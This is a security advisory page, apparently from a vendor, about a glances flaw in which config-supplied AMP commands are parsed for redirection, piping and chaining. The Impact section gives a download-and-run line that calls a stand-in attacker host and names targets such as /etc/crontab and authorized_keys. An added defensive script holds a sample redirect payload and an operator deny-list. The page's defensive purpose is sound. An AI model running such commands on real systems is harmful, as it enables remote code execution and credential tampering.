glances

CVE-2026-53925

CVE-2026-53925 is a high-severity path traversal vulnerability in glances (pip), affecting versions >= 4.0.8, < 4.5.5. It is fixed in 4.5.5.

Key facts
CVSS score
7.8
High
Attack vector
Local
Issuing authority
GitHub Advisory Database
Affected package
glances
Fixed in
4.5.5
Disclosed
2026

Summary

The secure_popen() function in glances/secure.py interprets > (file redirection), | (pipe), and && (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command. When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via >), chain arbitrary commands (via &&), or pipe command output to arbitrary programs (via |).

Crucially, this vulnerability is not mitigated by the --disable-config-exec flag that was introduced to address CVE-2026-33641. That flag only disables backtick command execution in config.get_value(); it does not affect the secure_popen() function's interpretation of shell-like operators.

Details

Affected code path 1, Default AMP (glances/amps/default/__init__.py:69)

The command config value is loaded from [amp_<name>] sections via GlancesAmp.load_config() (glances/amps/amp.py:81):

Affected code path 2, SystemV AMP (glances/amps/systemv/__init__.py:60)

The service_cmd config value is loaded from [amp_systemv] sections via the same GlancesAmp.load_config() method.

Sink, secure_popen() (glances/secure.py:33-77)

The function explicitly parses:

  • > for file redirection (line 39): cmd.split('>'); the path after > is used directly in open(stdout_redirect, "w") (line 71) with no path validation.
  • | for command piping (line 51): cmd.split('|'); each segment is executed as a separate Popen with stdout piped to the next.
  • && for command chaining (line 27 in secure_popen()): cmd.split('&&'); each segment is executed sequentially.

None of these operators are sanitized or restricted when loading AMP configuration values.

Why --disable-config-exec does not help

The --disable-config-exec flag (introduced for CVE-2026-33641) only prevents system_exec() from running backtick-embedded commands in config.get_value(). It does not affect how the resulting string value is processed by secure_popen(). A command value like echo data > /etc/crontab contains no backticks and passes through get_value() unchanged; secure_popen() then interprets the > operator and writes to the arbitrary path.

PoC

Clean-checkout recipe:

Create a test configuration file:

Run a Python script that simulates the AMP command execution path:

Expected vulnerable output:

Negative/control case (demonstrating --disable-config-exec only blocks backticks):

Cleanup:

Impact

An attacker who can modify glances.conf (e.g., through a separate file-write vulnerability, a misconfigured shared filesystem, a configuration management system, or a container volume mount) can:

  • Write arbitrary content to arbitrary files via the > operator, e.g., overwriting /etc/crontab, ~/.ssh/authorized_keys, or any file writable by the Glances process user.
  • Execute arbitrary commands via the && and | operators, e.g., echo x && curl http://attacker.com/shell.sh | bash.
  • Exfiltrate data via the | operator, piping command output to network utilities.

The existing --disable-config-exec mitigation for CVE-2026-33641 does not protect against this vulnerability because it operates at a different layer (config.get_value() backtick processing vs. secure_popen() operator interpretation).

Suggested remediation

  • Remove file redirection support from secure_popen() unless explicitly required. The > operator in __secure_popen() (lines 39-45, 69-72) writes to arbitrary paths. Consider removing this feature or restricting output paths to a safe directory (e.g., a configured output directory with path traversal protection).
  • Sanitize AMP command values before passing them to secure_popen(). Apply the same sanitization used in actions.py:sanitize_mustache_dict() to strip &&, |, >>, and > from AMP command and service_cmd config values, or refuse to execute commands containing these operators.
  • Consider replacing secure_popen() with subprocess.run(shell=False) using explicit argument arrays. The secure_popen() function reimplements shell-like operator parsing (&&, |, >), which is inherently risky. Standard subprocess.run() with shell=False and an explicit argument list avoids this class of vulnerability entirely.
  • Add a regression test that verifies AMP commands cannot contain file redirection or command chaining operators.
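The following is an added example written for this page; it is not code from glances or from the advisory. It illustrates two things the text above describes: how an unsanitized AMP command read from an [amp_<name>] section is split by a secure_popen-style parser (the splitting order mirrors the advisory's description of lines 27, 39 and 51, but the function here is a re-implementation for illustration, not the project's own), and the suggested remediation of refusing operator-bearing values and executing the remainder with subprocess.run(shell=False). The configuration fragment, the section and key names, and the operator list are constructed assumptions; no file is written anywhere.

```python
"""Added example (not glances' code): AMP command flow from config to sink,
and a hardened replacement that refuses shell-like operators."""
import configparser
import shlex
import subprocess

# Constructed glances.conf fragment. Section/key names follow the advisory's
# description ([amp_<name>] with a "command" key); this is sample input only.
SAMPLE_CONF = """
[amp_example]
enable=true
regex=.*example.*
command=echo data > /tmp/pwned
"""

# Assumed deny-list. The advisory names &&, |, >> and >; the remaining
# entries are added here as a conservative extension (a backtick on its own
# is what --disable-config-exec blocks, so it is listed for completeness).
SHELL_OPERATORS = ("&&", "||", "|", ">>", ">", "<", ";", "`", "$(")


def load_amp_commands(conf_text):
    """Return {section: raw command} for every [amp_*] section.

    Mirrors the unsanitized load the advisory describes: the string is taken
    from the config verbatim, so any operator inside it survives.
    """
    cp = configparser.ConfigParser()
    cp.read_string(conf_text)
    commands = {}
    for section in cp.sections():
        if not section.startswith("amp_"):
            continue
        for key in ("command", "service_cmd"):
            if cp.has_option(section, key):
                commands[section] = cp.get(section, key)
    return commands


def split_like_secure_popen(cmd):
    """Re-implementation of the operator parsing described in the advisory.

    Order follows the text: '&&' chains are split first, then each chain is
    split on '>' for a redirect target, then the left side on '|' for a
    pipeline. Returns [(list_of_argv, redirect_path_or_None), ...]. The
    redirect path is whatever text follows '>', with no validation at all,
    which is the sink the advisory points at.
    """
    pipelines = []
    for chained in cmd.split("&&"):
        left, _, target = chained.partition(">")
        redirect = target.strip() or None  # used verbatim by the sink
        argvs = [shlex.split(segment) for segment in left.split("|")]
        pipelines.append((argvs, redirect))
    return pipelines


def has_shell_operator(cmd):
    """True if the command contains any operator from the deny-list."""
    return any(op in cmd for op in SHELL_OPERATORS)


def run_amp_command_safely(cmd):
    """Hardened path from the remediation section.

    Refuses operator-bearing values outright, then executes the remaining
    command as an explicit argv with shell=False, so no redirection, piping
    or chaining can happen regardless of what the config contained.
    """
    if has_shell_operator(cmd):
        raise ValueError(f"refusing AMP command with shell operator: {cmd!r}")
    argv = shlex.split(cmd)
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    for section, raw in load_amp_commands(SAMPLE_CONF).items():
        print(section, "->", split_like_secure_popen(raw))
        try:
            run_amp_command_safely(raw)
        except ValueError as exc:
            print("blocked:", exc)
    print("allowed:", run_amp_command_safely("echo data").strip())
```

Running the block shows the config value `echo data > /tmp/pwned` parsed into an argv of `["echo", "data"]` plus a raw redirect target of `/tmp/pwned`, and the hardened path rejecting it while still executing a plain `echo data`.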

Impact

What is path traversal?

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

Severity and exposure

CVE-2026-53925 has a CVSS score of 7.8 (High). The vector requires local access and low privileges, with no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment.

A fixed version is available (4.5.5). Upgrading removes the vulnerable code path.

Affected versions

pip

  • glances (>= 4.0.8, < 4.5.5)

Security releases

  • glances → 4.5.5 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter instead of chasing every advisory.

Kodem's runtime-powered SCA identifies whether CVE-2026-53925 is reachable in your applications. Explore open-source security for your team.

See if CVE-2026-53925 is reachable in your applications. Get a demo

Already deployed Kodem? See CVE-2026-53925 in your environment

Remediation advice

Upgrade glances to 4.5.5 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently asked questions about CVE-2026-53925

What is CVE-2026-53925?

CVE-2026-53925 is a high-severity path traversal vulnerability in glances (pip), affecting versions >= 4.0.8, < 4.5.5. It is fixed in 4.5.5. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.

How severe is CVE-2026-53925?

CVE-2026-53925 has a CVSS score of 7.8 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.

Which versions of glances are affected by CVE-2026-53925?

glances (pip) versions >= 4.0.8, < 4.5.5 are affected.

Is there a fix for CVE-2026-53925?

Yes. CVE-2026-53925 is fixed in 4.5.5. Upgrade to this version or later.

Is CVE-2026-53925 exploitable, and should I be worried?

Whether CVE-2026-53925 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo

What actually determines whether CVE-2026-53925 is exploitable, and how bad it is?

Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.

How do I fix CVE-2026-53925?

Upgrade glances to 4.5.5 or later.

Stop the waste.
Protect your environment with Kodem.